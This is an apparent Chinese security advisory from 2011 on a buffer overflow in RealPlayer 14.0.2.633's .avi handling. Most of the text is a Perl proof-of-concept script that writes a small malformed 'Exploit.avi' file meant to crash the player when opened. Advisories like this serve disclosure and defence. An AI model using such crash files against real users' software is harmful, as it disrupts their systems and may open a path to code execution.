安全研究

安全漏洞
RealPlayer ".avi"文件处理远程缓冲区溢出漏洞

发布日期:2011-04-01
更新日期:2011-04-02

受影响系统:
Real Networks RealPlayer 14.0.2 633
描述:
BUGTRAQ  ID: 47114

RealPlayer是音乐和影像的播放工具。

RealPlayer在处理畸形.avi文件时存在远程缓冲区溢出漏洞,远程攻击者可利用此漏洞在应用程序中执行任意代码,造成拒绝服务。

<*来源:cr4wl3r
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl  

#(+)Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit  

#(+)Software Link: www.soft32.com/download_122615.html  

#(+)Software:  Real player  

#(+)Version:   14.0.2.633  

#(+)Tested On: WIN-XP SP3  

#(+) Date    : 31.03.2011  

#(+) Hour    : 13:37 PM  

#Similar Bug was found by cr4wl3r in MediaPlayer Classic  

system("color 6");  

system("title Real player 14.0.2.633 Buffer overflow/DOS Exploit");  

print "  

_______________________________________________________________________  

                                                                      

(+)Exploit Title: Real player 14.0.2.633 Buffer overflow/DOS Exploit    

    

(+) Software Link: www.soft32.com/download_122615.html                    

(+) Software:  Real player                                                

(+) Version:   14.0.2.633                                                

(+) Tested On: WIN-XP SP3                                                

(+) Date    : 31.03.2011                                                  

(+) Hour    : 13:37 PM                                                    

____________________________________________________________________\n";  

sleep 2;  

system("cls");  

system("color 2");  

print "\nGenerating the exploit file !!!";  

sleep 2;  

print "\n\nExploit.avi file generated!!";  

sleep 2;  

$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  

    

open(file, "> Exploit.avi");  

print (file $theoverflow);  

print "\n\n(+) Done!\n  

(+) Now Just open Explot.avi with Real Player and Kaboooommm !! ;) \n  

(+) Most of the times there is a crash\n whenever you open the folder where the Exploit.avi is stored :D \n";  

  

sleep 3;  

system("cls");  

sleep 1;  

system("color C");  

print "\n\n\n########################################################################\n  

(+)Exploit Coded by: ^Xecuti0N3r \n  

(+)^Xecuti0N3r: E-mail \n  

(+)d3M0l!tioN3r: E-mail \n  

(+)Special Thanks to: MaxCaps, aNnIh!LatioN3r & d3M0l!tioN3r \n  

########################################################################\n\n";  

system("pause");

建议:
厂商补丁:

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.real.com

浏览次数:2444
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障